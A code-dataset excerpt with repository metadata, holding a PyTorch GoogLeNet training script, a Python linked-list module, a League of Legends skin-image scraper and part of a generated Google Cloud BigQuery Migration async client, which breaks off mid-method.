            # global rank among all the processes
            args.rank = args.rank * ngpus_per_node + gpu
        dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
                                world_size=args.world_size, rank=args.rank)
    # create model
    if 'googlenet' in args.arch:  # NEW
        if args.pretrained:
            model = GoogLeNet.from_pretrained(args.arch, num_classes=args.num_classes)
            print("=> using pre-trained model '{}'".format(args.arch))
        else:
            print("=> creating model '{}'".format(args.arch))
            model = GoogLeNet.from_name(args.arch, args.resume, num_classes=args.num_classes)
    else:
        # NOTE(review): runtime string contains a typo ("Plesase") -- left
        # untouched here; fix belongs in a behavior-changing commit.
        warnings.warn("Plesase --arch googlenet.")
    if args.distributed:
        # For multiprocessing distributed, DistributedDataParallel constructor
        # should always set the single device scope, otherwise,
        # DistributedDataParallel will use all available devices.
        if args.gpu is not None:
            torch.cuda.set_device(args.gpu)
            model.cuda(args.gpu)
            # When using a single GPU per process and per
            # DistributedDataParallel, we need to divide the batch size
            # ourselves based on the total number of GPUs we have
            args.batch_size = int(args.batch_size / ngpus_per_node)
            args.workers = int(args.workers / ngpus_per_node)
            model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])
        else:
            model.cuda()
            # DistributedDataParallel will divide and allocate batch_size to all
            # available GPUs if device_ids are not set
            model = torch.nn.parallel.DistributedDataParallel(model)
    elif args.gpu is not None:
        torch.cuda.set_device(args.gpu)
        model = model.cuda(args.gpu)
    else:
        # DataParallel will divide and allocate batch_size to all available
        # GPUs
        if args.arch.startswith('googlenet'):
            model.features = torch.nn.DataParallel(model.features)
            model.cuda()
        else:
            model = torch.nn.DataParallel(model).cuda()
    get_parameter_number(model)
    # define loss function (criterion) and optimizer
    criterion = nn.CrossEntropyLoss().cuda(args.gpu)
    optimizer = torch.optim.SGD(model.parameters(), args.lr,
                                momentum=args.momentum,
                                weight_decay=args.weight_decay)
    # optionally resume from a checkpoint
    if args.resume:
        if os.path.isfile(args.resume):
            print(f"=> loading checkpoint '{args.resume}'")
            checkpoint = torch.load(args.resume)
            args.start_epoch = checkpoint['epoch']
            best_acc1 = checkpoint['best_acc1']
            model.load_state_dict(checkpoint['state_dict'])
            optimizer.load_state_dict(checkpoint['optimizer'])
            print(f"=> loaded checkpoint '{args.resume}' (epoch {checkpoint['epoch']})")
        else:
            print(f"=> no checkpoint found at '{args.resume}'")
    cudnn.benchmark = True
    # Data loading code
    traindir = os.path.join(args.data, 'train')
    valdir = os.path.join(args.data, 'test')
    normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
                                     std=[0.229, 0.224, 0.225])
    train_dataset = datasets.ImageFolder(
        traindir,
        transform=transforms.Compose([
            transforms.RandomResizedCrop(args.image_size),
            transforms.RandomHorizontalFlip(),
            transforms.ToTensor(),
            normalize,
        ]))
    if args.distributed:
        train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)
    else:
        train_sampler = None
    train_loader = torch.utils.data.DataLoader(
        train_dataset, batch_size=args.batch_size, shuffle=True,
        num_workers=args.workers, pin_memory=True)
    # Validation transforms: fixed 224 crop for googlenet, classic 256/224 otherwise.
    if 'googlenet' in args.arch:
        image_size = 224
        val_transforms = transforms.Compose([
            transforms.Resize(image_size, interpolation=PIL.Image.BICUBIC),
            transforms.CenterCrop(image_size),
            transforms.ToTensor(),
            normalize,
        ])
        print('Using image size', image_size)
    else:
        val_transforms = transforms.Compose([
            transforms.Resize(256),
            transforms.CenterCrop(224),
            transforms.ToTensor(),
            normalize,
        ])
        print('Using image size', 224)
    val_loader = torch.utils.data.DataLoader(
        datasets.ImageFolder(valdir, val_transforms),
        batch_size=args.batch_size, shuffle=False,
        num_workers=args.workers, pin_memory=True)
    # Evaluation-only mode: score once, dump the result, and exit.
    if args.evaluate:
        res1, res5 = validate(val_loader, model, criterion, args)
        with open('res.txt', 'w') as f:
            print(f"Acc@1: {res1}\tAcc@5: {res5}", file=f)
        return
    for epoch in range(args.start_epoch, args.epochs):
        if args.distributed:
            train_sampler.set_epoch(epoch)
        adjust_learning_rate(optimizer, epoch, args)
        # train for one epoch
        train(train_loader, model, criterion, optimizer, epoch, args)
        # evaluate on validation set
        acc1, _ = validate(val_loader, model, criterion, args)
        # remember best acc@1 and save checkpoint
        is_best = acc1 > best_acc1
        best_acc1 = max(acc1, best_acc1)
        if not args.multiprocessing_distributed or (args.multiprocessing_distributed
                                                    and args.rank % ngpus_per_node == 0):
            save_checkpoint({
                'epoch': epoch + 1,
                'arch': args.arch,
                'state_dict': model.state_dict(),
                'best_acc1': best_acc1,
                'optimizer': optimizer.state_dict(),
            }, is_best)
def train(train_loader, model, criterion, optimizer, epoch, args):
    """Run one training epoch, logging loss/accuracy every args.print_freq batches."""
    batch_time = AverageMeter('Time', ':6.3f')
    data_time = AverageMeter('Data', ':6.3f')
    losses = AverageMeter('Loss', ':4.4f')
    top1 = AverageMeter('Acc@1', ':6.2f')
    top5 = AverageMeter('Acc@5', ':6.2f')
    progress = ProgressMeter(len(train_loader), batch_time, data_time, losses, top1,
                             top5, prefix="Epoch: [{}]".format(epoch))
    # switch to train mode
    model.train()
    end = time.time()
    for i, (images, target) in enumerate(train_loader):
        # measure data loading time
        data_time.update(time.time() - end)
        if args.gpu is not None:
            images = images.cuda(args.gpu, non_blocking=True)
        target = target.cuda(args.gpu, non_blocking=True)
        # compute output
        output = model(images)
        loss = criterion(output, target)
        # measure accuracy and record loss
        acc1, acc5 = accuracy(output, target, topk=(1, 5))
        losses.update(loss.item(), images.size(0))
        top1.update(acc1.item(), images.size(0))
        top5.update(acc5.item(), images.size(0))
        # compute gradient and do SGD step (optimizer built in main_worker is SGD)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        # measure elapsed time
        batch_time.update(time.time() - end)
        end = time.time()
        if i % args.print_freq == 0:
            progress.print(i)
def validate(val_loader, model, criterion, args):
    """Evaluate the model on the validation set.

    Returns:
        (top-1 accuracy, top-5 accuracy) averaged over all samples.
    """
    batch_time = AverageMeter('Time', ':6.3f')
    losses = AverageMeter('Loss', ':4.4f')
    top1 = AverageMeter('Acc@1', ':6.2f')
    top5 = AverageMeter('Acc@5', ':6.2f')
    progress = ProgressMeter(len(val_loader), batch_time, losses, top1, top5,
                             prefix='Test: ')
    # switch to evaluate mode
    model.eval()
    with torch.no_grad():
        end = time.time()
        for i, (images, target) in enumerate(val_loader):
            if args.gpu is not None:
                images = images.cuda(args.gpu, non_blocking=True)
            target = target.cuda(args.gpu, non_blocking=True)
            # compute output
            output = model(images)
            loss = criterion(output, target)
            # measure accuracy and record loss
            acc1, acc5 = accuracy(output, target, topk=(1, 5))
            losses.update(loss.item(), images.size(0))
            top1.update(acc1.item(), images.size(0))
            top5.update(acc5.item(), images.size(0))
            # measure elapsed time
            batch_time.update(time.time() - end)
            end = time.time()
            if i % args.print_freq == 0:
                progress.print(i)
        print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
              .format(top1=top1, top5=top5))
    return top1.avg, top5.avg
def save_checkpoint(state, is_best, filename='checkpoint.pth'):
    """Serialize *state* to *filename*; mirror it to model_best.pth when best."""
    torch.save(state, filename)
    if not is_best:
        return
    # Keep a stable copy of the best-performing checkpoint.
    shutil.copyfile(filename, 'model_best.pth')
class AverageMeter(object):
    """Track a metric's most recent value plus its running average.

    Note: this local definition shadows the AverageMeter imported from
    googlenet.utils at the top of the file.
    """

    def __init__(self, name, fmt=':f'):
        self.name = name
        self.fmt = fmt
        self.reset()

    def reset(self):
        # Clear all running statistics back to zero.
        self.val = 0
        self.avg = 0
        self.sum = 0
        self.count = 0

    def update(self, val, n=1):
        # Record *val* observed *n* times and refresh the running mean.
        self.val = val
        self.count += n
        self.sum += val * n
        self.avg = self.sum / self.count

    def __str__(self):
        template = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
        return template.format(**self.__dict__)
class ProgressMeter(object):
    """Render a progress line: prefix, [batch/total], then each meter."""

    def __init__(self, num_batches, *meters, prefix=""):
        self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
        self.meters = meters
        self.prefix = prefix

    def print(self, batch):
        # Intentionally named `print`; the call below still resolves to the builtin.
        pieces = [self.prefix + self.batch_fmtstr.format(batch)]
        pieces.extend(str(meter) for meter in self.meters)
        print('\t'.join(pieces))

    @staticmethod
    def _get_batch_fmtstr(num_batches):
        # Width of the counter field equals the digit count of the total.
        width = len(str(num_batches // 1))
        slot = '{:' + str(width) + 'd}'
        return '[' + slot + '/' + slot.format(num_batches) + ']'
# Script entry point.
if __name__ == '__main__':
    main()
| [
"liuchangyu1111@gmail.com"
] | liuchangyu1111@gmail.com |
8d885ef2e93980e5def6f244100248ff3d8b56d7 | 199eb36ba39440723db98e391ef7cea4abece1df | /chapter-2/linked_list.py | e4f855987e1c94b34bbca8c61bdf566e2435feea | [] | no_license | wahabtobibello/coding-challenges | eb187c657434d5c432bb77d72cab193fd61b4839 | d968711e76c717b5d18f288a4585aaef93118b8f | refs/heads/master | 2023-04-27T18:13:45.650392 | 2018-12-02T14:31:44 | 2018-12-02T14:31:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | class Node():
def __init__(self, data, next=None):
self.data = data
self.next = next
class LinkedList():
    """Singly linked list built from a sequence of values."""

    def __init__(self, arr):
        """Build the list from *arr* in order.

        Generalized vs. the previous version: an empty sequence now yields
        an empty list (head is None) instead of raising IndexError.
        """
        self.head = None
        tail = None
        for item in arr:
            node = Node(item)
            if tail is None:
                self.head = node
            else:
                tail.next = node
            tail = node

    def append_to_tail(self, data):
        """Append a new node holding *data* at the end (O(n) walk)."""
        end = Node(data)
        if self.head is None:
            # List was empty: the new node becomes the head.
            self.head = end
            return
        node = self.head
        while node.next is not None:
            node = node.next
        node.next = end
def print_linked_list(linked_list):
    """Print the list's payloads joined by '->' (e.g. '1->2->3').

    Robustness fix: an empty list (head is None) now prints a blank line
    instead of raising AttributeError on None.head access.
    """
    parts = []
    node = linked_list.head
    while node is not None:
        parts.append(str(node.data))
        node = node.next
    print('->'.join(parts))
| [
"tobibello001@gmail.com"
] | tobibello001@gmail.com |
3822499a63ebcc84c6edbbd60ae303ba8dc6afd7 | 7a27414a9ddc208f07ba7a949b13a4af172741d0 | /代码管理/英雄联盟全皮肤爬取/LOLSkin_Spider.py | 3132a031654700d52b453ec5fff04c231096f95e | [] | no_license | 01xu10/myproject | 28cc51e0801df1f8f90704a5871f5bca05ce7609 | 0346bb952823f3cd4c8c383115f2a617f39f7cce | refs/heads/main | 2023-06-27T05:14:00.781065 | 2021-08-05T07:13:53 | 2021-08-05T07:13:53 | 384,674,992 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,265 | py | # !/usr/bin/env python
# -*- coding: utf-8 -*-
import requests, jsonpath, os
from pprint import pprint
def main():
    """Scrape every League of Legends skin splash image into per-hero folders."""
    start_url = r'https://game.gtimg.cn/images/lol/act/img/js/heroList/hero_list.js'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
                      'Chrome/87.0.4280.66 Safari/537.36'
    }
    # Step 2: first request -- fetch the hero list and pull out the hero ids.
    response = requests.get(start_url, headers=headers).json()
    pprint(response)
    hero_ids = jsonpath.jsonpath(response, '$..heroId')
    # pprint(hero_ids)
    hero_names = jsonpath.jsonpath(response, '$..name')
    # pprint(hero_names)
    # Step 3: build each hero_info page URL (hero_info contains no chroma skins).
    for hero_id, hero_name in zip(hero_ids, hero_names):
        hero_info_url = r'https://game.gtimg.cn/images/lol/act/img/js/hero/{}.js'.format(hero_id)
        # Step 4: request the hero page to get hero_img_info.
        hero_img_info = requests.get(hero_info_url, headers=headers).json()
        # pprint(hero_img_info)
        # Step 5: parse skin names and splash-image URLs (leading entries skipped
        # because the first matches are the hero itself, not skins).
        hero_skin_names = jsonpath.jsonpath(hero_img_info, '$..name')[2::]
        # pprint(hero_skin_names)
        hero_skin_urls = jsonpath.jsonpath(hero_img_info, '$..mainImg')[1::]
        # pprint(hero_skin_urls)
        # Step 6: iterate over (skin name, skin URL) pairs.
        for hero_skin_name, hero_skin_url in zip(hero_skin_names, hero_skin_urls):
            # pprint(hero_skin_url)
            # Step 7: download the image bytes; skip the skin on any failure.
            try:
                img_content = requests.get(hero_skin_url, headers=headers).content
                # pprint(img_content)
            except Exception as e:
                continue
            # Step 8: create the per-hero output folder.
            os.makedirs(r'./{}'.format(hero_name), exist_ok=True)
            # Step 9: write the image to disk; skip on I/O errors (e.g. bad
            # characters in the skin name).
            try:
                with open(r'./{}/{}.jpg'.format(hero_name, hero_skin_name), 'wb') as f:
                    f.write(img_content)
                    print('**图片正在下载:{}/{}.jpg'.format(hero_name, hero_skin_name))
            except Exception as e:
                continue
# Run the scraper only when executed as a script.
if __name__ == '__main__':
    main()
| [
"1150772265@qq.com"
] | 1150772265@qq.com |
52d23763ebfe518aeb958a0508b12fbec7a415c5 | 5da5473ff3026165a47f98744bac82903cf008e0 | /packages/google-cloud-bigquery-migration/google/cloud/bigquery_migration_v2/services/migration_service/async_client.py | d9ad8c3c5049dc7577a051be8d97608cd3ec7f4d | [
"Apache-2.0"
] | permissive | googleapis/google-cloud-python | ed61a5f03a476ab6053870f4da7bc5534e25558b | 93c4e63408c65129422f65217325f4e7d41f7edf | refs/heads/main | 2023-09-04T09:09:07.852632 | 2023-08-31T22:49:26 | 2023-08-31T22:49:26 | 16,316,451 | 2,792 | 917 | Apache-2.0 | 2023-09-14T21:45:18 | 2014-01-28T15:51:47 | Python | UTF-8 | Python | false | false | 41,641 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import (
Dict,
Mapping,
MutableMapping,
MutableSequence,
Optional,
Sequence,
Tuple,
Type,
Union,
)
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.api_core.client_options import ClientOptions
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.bigquery_migration_v2 import gapic_version as package_version
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.rpc import error_details_pb2 # type: ignore
from google.cloud.bigquery_migration_v2.services.migration_service import pagers
from google.cloud.bigquery_migration_v2.types import (
migration_entities,
migration_error_details,
migration_metrics,
migration_service,
)
from .client import MigrationServiceClient
from .transports.base import DEFAULT_CLIENT_INFO, MigrationServiceTransport
from .transports.grpc_asyncio import MigrationServiceGrpcAsyncIOTransport
class MigrationServiceAsyncClient:
"""Service to handle EDW migrations."""
_client: MigrationServiceClient
DEFAULT_ENDPOINT = MigrationServiceClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = MigrationServiceClient.DEFAULT_MTLS_ENDPOINT
migration_subtask_path = staticmethod(MigrationServiceClient.migration_subtask_path)
parse_migration_subtask_path = staticmethod(
MigrationServiceClient.parse_migration_subtask_path
)
migration_workflow_path = staticmethod(
MigrationServiceClient.migration_workflow_path
)
parse_migration_workflow_path = staticmethod(
MigrationServiceClient.parse_migration_workflow_path
)
common_billing_account_path = staticmethod(
MigrationServiceClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
MigrationServiceClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(MigrationServiceClient.common_folder_path)
parse_common_folder_path = staticmethod(
MigrationServiceClient.parse_common_folder_path
)
common_organization_path = staticmethod(
MigrationServiceClient.common_organization_path
)
parse_common_organization_path = staticmethod(
MigrationServiceClient.parse_common_organization_path
)
common_project_path = staticmethod(MigrationServiceClient.common_project_path)
parse_common_project_path = staticmethod(
MigrationServiceClient.parse_common_project_path
)
common_location_path = staticmethod(MigrationServiceClient.common_location_path)
parse_common_location_path = staticmethod(
MigrationServiceClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
MigrationServiceAsyncClient: The constructed client.
"""
return MigrationServiceClient.from_service_account_info.__func__(MigrationServiceAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
MigrationServiceAsyncClient: The constructed client.
"""
return MigrationServiceClient.from_service_account_file.__func__(MigrationServiceAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variable is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return MigrationServiceClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
@property
def transport(self) -> MigrationServiceTransport:
"""Returns the transport used by the client instance.
Returns:
MigrationServiceTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(MigrationServiceClient).get_transport_class, type(MigrationServiceClient)
)
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, MigrationServiceTransport] = "grpc_asyncio",
client_options: Optional[ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the migration service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.MigrationServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = MigrationServiceClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def create_migration_workflow(
self,
request: Optional[
Union[migration_service.CreateMigrationWorkflowRequest, dict]
] = None,
*,
parent: Optional[str] = None,
migration_workflow: Optional[migration_entities.MigrationWorkflow] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> migration_entities.MigrationWorkflow:
r"""Creates a migration workflow.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_create_migration_workflow():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.CreateMigrationWorkflowRequest(
parent="parent_value",
)
# Make the request
response = await client.create_migration_workflow(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.CreateMigrationWorkflowRequest, dict]]):
The request object. Request to create a migration
workflow resource.
parent (:class:`str`):
Required. The name of the project to which this
migration workflow belongs. Example:
``projects/foo/locations/bar``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
migration_workflow (:class:`google.cloud.bigquery_migration_v2.types.MigrationWorkflow`):
Required. The migration workflow to
create.
This corresponds to the ``migration_workflow`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_migration_v2.types.MigrationWorkflow:
A migration workflow which specifies
what needs to be done for an EDW
migration.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, migration_workflow])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.CreateMigrationWorkflowRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if migration_workflow is not None:
request.migration_workflow = migration_workflow
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_migration_workflow,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def get_migration_workflow(
self,
request: Optional[
Union[migration_service.GetMigrationWorkflowRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> migration_entities.MigrationWorkflow:
r"""Gets a previously created migration workflow.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_get_migration_workflow():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.GetMigrationWorkflowRequest(
name="name_value",
)
# Make the request
response = await client.get_migration_workflow(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.GetMigrationWorkflowRequest, dict]]):
The request object. A request to get a previously created
migration workflow.
name (:class:`str`):
Required. The unique identifier for the migration
workflow. Example:
``projects/123/locations/us/workflows/1234``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_migration_v2.types.MigrationWorkflow:
A migration workflow which specifies
what needs to be done for an EDW
migration.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.GetMigrationWorkflowRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_migration_workflow,
default_retry=retries.Retry(
initial=1.0,
maximum=10.0,
multiplier=1.3,
predicate=retries.if_exception_type(
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_migration_workflows(
self,
request: Optional[
Union[migration_service.ListMigrationWorkflowsRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListMigrationWorkflowsAsyncPager:
r"""Lists previously created migration workflow.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_list_migration_workflows():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.ListMigrationWorkflowsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_migration_workflows(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.ListMigrationWorkflowsRequest, dict]]):
The request object. A request to list previously created
migration workflows.
parent (:class:`str`):
Required. The project and location of the migration
workflows to list. Example:
``projects/123/locations/us``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_migration_v2.services.migration_service.pagers.ListMigrationWorkflowsAsyncPager:
Response object for a ListMigrationWorkflows call.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.ListMigrationWorkflowsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_migration_workflows,
default_retry=retries.Retry(
initial=1.0,
maximum=10.0,
multiplier=1.3,
predicate=retries.if_exception_type(
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListMigrationWorkflowsAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def delete_migration_workflow(
self,
request: Optional[
Union[migration_service.DeleteMigrationWorkflowRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes a migration workflow by name.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_delete_migration_workflow():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.DeleteMigrationWorkflowRequest(
name="name_value",
)
# Make the request
await client.delete_migration_workflow(request=request)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.DeleteMigrationWorkflowRequest, dict]]):
The request object. A request to delete a previously
created migration workflow.
name (:class:`str`):
Required. The unique identifier for the migration
workflow. Example:
``projects/123/locations/us/workflows/1234``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
